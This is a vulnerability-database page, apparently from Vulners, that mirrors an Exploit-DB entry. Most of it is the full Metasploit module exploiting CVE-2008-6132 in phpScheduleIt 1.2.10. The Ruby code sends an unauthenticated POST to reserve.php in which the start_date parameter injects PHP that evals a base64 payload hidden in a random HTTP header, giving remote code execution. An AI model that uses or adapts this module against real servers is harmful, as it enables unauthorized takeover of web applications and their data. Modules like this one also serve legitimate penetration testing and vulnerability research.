Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

phpScheduleIt 1.2.10 - 'reserve.php' Arbitrary Code Injection (Metasploit)

🗓️ 26 Oct 2011 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 25 Views

phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today		phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Injection
25 Oct 201100:00
zdt
Circl		CVE-2008-6132
1 Oct 200800:00
circl
CVE		CVE-2008-6132
13 Feb 200918:00
cve
Cvelist		CVE-2008-6132
13 Feb 200918:00
cvelist
Metasploit		phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection
26 Oct 201118:06
metasploit
NVD		CVE-2008-6132
13 Feb 200918:30
nvd
OpenVAS		phpScheduleIt 'reserve.php' Remote Code Execution Vulnerability
20 Jul 200900:00
openvas
OpenVAS		phpScheduleIt 'reserve.php' RCE Vulnerability
20 Jul 200900:00
openvas
Packet Storm		phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection
27 Oct 201100:00
packetstorm
Tenable Nessus		phpScheduleIt reserve.php start_date Parameter Arbitrary Command Injection
3 Oct 200800:00
nessus
Rows per page
##
# $Id: phpscheduleit_start_date.rb 14073 2011-10-26 18:06:12Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name' => 'phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection',
			'Description'    => %q{
					This module exploits an arbitrary PHP code execution flaw in the phpScheduleIt
				software. This vulnerability is only exploitable when the magic_quotes_gpc PHP
				option is 'off'. Authentication is not required to exploit the bug.

				Version 1.2.10 and earlier of phpScheduleIt are affected.
			},
			'Author'         =>
				[
					'EgiX',        # Vulnerability Discovery and Exploit
					'juan vazquez' # Metasploit module
				],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 14073 $',
			'References'     =>
				[
					['CVE', '2008-6132'],
					['OSVDB', '48797'],
					['BID', '31520'],
					['URL', 'http://www.exploit-db.com/exploits/6646/'],
				],
			'Privileged'     => false,
			'Platform'       => ['php'],
			'Arch'           => ARCH_PHP,
			'Payload'        =>
				{
					# max header length for Apache,
					# http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize
					'Space'       => 8190,
					'DisableNops' => true,
					'Keys'        => ['php'],
				},
			'Targets'        => [ ['Automatic', { }] ],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Oct 1 2008'))

		register_options(
			[
				OptString.new('URI', [ true,  "The full URI path to phpScheduleIt", '/phpscheduleit']),
			], self.class)
	end

	def check
		signature = rand_text_alpha(rand(10)+10)
		stub = "1').${print('#{signature}')}.${die};#"
		my_payload = "btnSubmit=1&start_date=#{stub}"

		if datastore['URI'][-1, 1] == "/"
			uri = datastore['URI'] + "reserve.php"
		else
			uri = datastore['URI'] + "/reserve.php"
		end

		print_status("Checking uri #{uri}")

		response = send_request_cgi({
			'method' => "POST",
			'global' => true,
			'uri' => uri,
			'headers' => {
					'Referer' => uri,
				},
			'data' => "#{my_payload}"
		})

		if response.code == 200 and response.body =~ /#{signature}/
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		headername = "X-" + Rex::Text.rand_text_alpha_upper(rand(10)+10)
		stub = "1').${error_reporting(0)}.${eval(base64_decode($_SERVER[HTTP_#{headername.gsub("-", "_")}]))};#"
		my_payload = "btnSubmit=1&start_date=#{stub}"

		if datastore['URI'][-1, 1] == "/"
			uri = datastore['URI'] + "reserve.php"
		else
			uri = datastore['URI'] + "/reserve.php"
		end

		print_status("Sending request for: #{uri}")
		print_status("Payload embedded in header: #{headername}")

		response = send_request_cgi({
			'method' => "POST",
			'global' => true,
			'uri' => uri,
			'headers' => {
					headername  => Rex::Text.encode_base64(payload.encoded),
					'Referer'   => uri
				},
			'data' => "#{my_payload}"
		}, 3)

		if response and response.code != 200
			print_error("Server returned a non-200 status code: (#{response.code})")
		end

		handler
	end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Oct 2011 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 26.8
EPSS0.77215
metasploitcode injectionphpscheduleitarbitrarycveosvdbbid
25